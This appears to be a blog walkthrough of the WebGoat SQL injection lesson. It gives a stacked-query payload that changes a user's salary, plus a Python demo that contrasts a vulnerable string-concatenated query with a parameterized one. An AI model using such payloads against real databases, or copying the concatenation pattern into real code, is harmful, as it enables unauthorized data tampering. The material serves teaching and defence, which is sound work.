
Monday, August 22, 2011

WebGoat - Modify Data with SQL Injection

Requirement:



Solution:

As the picture above shows, the page runs a SQL search built from the user's input, and the table has two columns (USERID and SALARY).
To check whether there is a SQL injection vulnerability, we enter a single quote and get the following error message back from the server:



Now we know the structure of the SQL statement:

SELECT * FROM salaries WHERE userid = '''

Here, "salaries" is the table name. Now we can construct the malicious input:

jsmith'; UPDATE salaries SET SALARY=5000 WHERE userid='jsmith

The user's input injects a second SQL statement. The two SQL statements are:

SELECT * FROM salaries WHERE userid = 'jsmith'; UPDATE salaries SET SALARY=5000 WHERE userid='jsmith'

Submit, and jsmith's salary is changed to 5000.
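
The same input run against a string-concatenated query and against a parameterized one, as an added example that is not part of the original post or of WebGoat's own code. It assumes an in-memory SQLite database with constructed starting salaries; the function names are hypothetical, and `executescript()` stands in for a database driver that accepts several statements in one call.

```python
import sqlite3

# The input used in the lesson above.
LESSON_INPUT = "jsmith'; UPDATE salaries SET SALARY=5000 WHERE userid='jsmith"

def make_db():
    """Build a throwaway table shaped like the lesson's (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE salaries (userid TEXT PRIMARY KEY, salary INTEGER)")
    db.executemany("INSERT INTO salaries VALUES (?, ?)",
                   [("jsmith", 20000), ("lsmith", 45000)])
    db.commit()
    return db

def salary_of(db, userid):
    row = db.execute("SELECT salary FROM salaries WHERE userid = ?",
                     (userid,)).fetchone()
    return row[0] if row else None

def lookup_concatenated(db, user_input):
    """Vulnerable: the input is pasted into the SQL text, so its quote and
    semicolon become SQL syntax and a second statement is executed."""
    sql = "SELECT * FROM salaries WHERE userid = '" + user_input + "'"
    db.executescript(sql)  # runs every ';'-separated statement in the string

def lookup_parameterized(db, user_input):
    """Hardened: the input is bound as a value and is never parsed as SQL."""
    return db.execute("SELECT * FROM salaries WHERE userid = ?",
                      (user_input,)).fetchall()

def demo():
    vulnerable_db = make_db()
    lookup_concatenated(vulnerable_db, LESSON_INPUT)

    hardened_db = make_db()
    rows = lookup_parameterized(hardened_db, LESSON_INPUT)

    # (salary after concatenated query, salary after bound query, rows matched)
    return (salary_of(vulnerable_db, "jsmith"),
            salary_of(hardened_db, "jsmith"),
            rows)

if __name__ == "__main__":
    print(demo())
```

With the bound parameter the whole input is compared as one literal userid, so it matches no row and the table is unchanged.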
